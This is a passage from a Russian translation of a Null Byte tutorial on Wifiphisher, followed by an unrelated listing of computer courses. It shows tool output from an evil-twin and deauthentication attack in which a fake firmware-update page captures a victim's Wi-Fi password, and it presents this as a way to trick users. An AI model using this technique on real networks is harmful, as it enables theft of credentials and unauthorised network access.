Когда цель вводит пароль, мы уведомляемся на экране Wifiphisher.

  Канал расширений: DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ DEAUTH / DISAS - ██████████████████ Жертва █████████████████ проверила WLAN с помощью ESSID: 'FakeNed' (KARMA) Жертва █████████████████ проверила WLAN с помощью ESSID: «Хармонд Фернандес» (Злой близнец) Связанные жертвы: ██████████████████ 10.0.0.13 Apple iOS / MacOS ██████████████████ 10.0.0.29 Murata Manufacturing HTTPS-запросы: [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] Запрос GET из 10.0.0.13 для http://captive.apple.com/hotspot-detect.html [*] POST-запрос из 10.0.0.13 с wfphshr-wpa-password = myfatpassword [*] Запрос GET от 10.0.0.13 для http://captive.apple.com/hotspot-detect.html  

Вот и все! Сценарий завершится и представит вам только что введенный пароль.

  [*] Запуск Wifiphisher 1.4GIT (https://wifiphisher.org) в 2020-02-04 08:10 [+] Обнаружен часовой пояс. Установка диапазона каналов от 1 до 13 [+] Выбор интерфейса wfphshr-wlan0 для атаки деаутентификации [+] Выбор интерфейса wlan1 для создания мошеннической точки доступа [+] Изменение MAC-адреса wlan1 (BSSID) на 00: 00: 00: 31: 8c: e5 [!] Не удалось установить MAC-адрес. (Пробовал 00: 00: 00: ee: 5c: 95) [+] Отправка SIGKILL на wpa_supplicant [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL dhclient [+] Отправка SIGKILL в NetworkManager [*] Убрал аренду, запустил DHCP, настроил iptables [+] Выбор шаблона страницы обновления прошивки [*] Запуск фейковой точки доступа... [*] Запуск HTTP / HTTPS-сервера на портах 8080, 443 [+] Покажи свою поддержку! [+] Следите за нами: https://twitter.com/wifiphisher [+] Ставьте лайк: https://www.facebook.com/Wifiphisher [+] Полученные учетные данные: wfphshr-wpa-password = myfatpassword [!] Закрытие  

Вот так, вы обошли любую защиту паролем и обманом заставили пользователя ввести пароль Wi-Fi в вашу поддельную сеть. Хуже того, они все еще застревают за этим ужасным медленным фальшивым экраном загрузки.

Если вы ищете дешевую удобную платформу для начала работы с Wifipfisher, ознакомьтесь с нашей сборкой Kali Linux Raspberry Pi с использованием недорогой Raspberry Pi.

Изображение Kody / Null Byte

Надеюсь, вам понравилось это руководство по атакам социальной инженерии с использованием Wifiphisher! Если у вас есть какие-либо вопросы об этом руководстве по захвату паролей Wi-Fi или у вас есть комментарий, сделайте это ниже и не стесняйтесь обращаться ко мне в Twitter @KodyKinzie.

Начните взламывать сегодня: настройте безголовую платформу для взлома Raspberry Pi под управлением Kali Linux

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою профессиональную хакерскую карьеру с помощью нашего комплекта обучения премиум-сертификату по этическому хакерству 2020 года в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области этического хакерства.

Купить сейчас (90% скидка)>

Изображение на обложке Джастина Мейерса / Gadget Hacks; Скриншоты Kody / Null Byte .

Смотрите также



Компьютерные курсы по направлениям:

Для начинающих


A

Компьютер для начинающих: Word, Excel, Access и другие программы!

Графические пакеты


B

Популярные пакеты Adobe Photoshop, CorelDraw, ArchiCAD, AutoCAD и другие!

WEB + анимация


C

Курсы по созданию сайтов, WEB-дизайну и крутой анимации в Adobe Flash!

Бухгалтерия + делопроизводство

Сетевые технологии


E

Курсы сборки ПК, системных администраторов и защиты информации!